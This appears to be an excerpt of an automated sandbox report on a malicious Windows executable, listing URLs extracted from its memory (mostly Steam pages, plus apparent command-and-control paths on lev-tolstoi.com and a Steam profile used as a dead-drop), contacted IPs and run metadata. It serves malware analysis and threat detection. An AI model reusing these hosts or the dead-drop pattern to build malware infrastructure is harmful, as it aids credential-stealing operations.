https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/profiles/76561199724331900lN | HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                              high
                                                                                              https://lev-tolstoi.com/dHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://steam.tv/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lev-tolstoi.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://store.steampowered.com/privacy_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://sketchfab.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lv.queniujq.cnHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.youtube.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steambroadcast.akamaized.nrMHK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/recaptcha/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://checkout.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/;HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/about/HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/my/wishlist/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://help.steampowered.com/en/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/market/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/news/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lev-tolstoi.com/apipHK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://recaptcha.net/recaptcha/;HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/discussions/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://store.steampowered.com/stats/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://medal.tvHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://broadcast.st.dl.eccdnx.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/steam_refunds/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://lev-tolstoi.com/apiv1HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/workshop/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://login.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
https://store.steampowered.com/legal/ | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://recaptcha.net | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
http://upx.sf.net | Amcache.hve.4.dr | false | high
https://store.steampowered.com/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
http://127.0.0.1:27060 | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://help.steampowered.com/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.steampowered.com/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
http://store.steampowered.com/account/cookiepreferences/ | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | false | high
https://store.steampowered.com/mobile | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
https://steamcommunity.com/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81 | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579755
Start date and time: 2024-12-23 08:37:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HK8IIasL9i.exe (renamed because the original name is a hash value)
Original Sample Name: 7dc18a69dcdca002579bfde5d5427ff2.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@10/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 15
• Number of non-executed functions: 215
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.53.18, 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:38:14 | API Interceptor | 9x Sleep call for process: HK8IIasL9i.exe modified
02:38:57 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.66.86 | MV ROCKET_PDA.exe | Get hash | malicious | FormBook | Browse
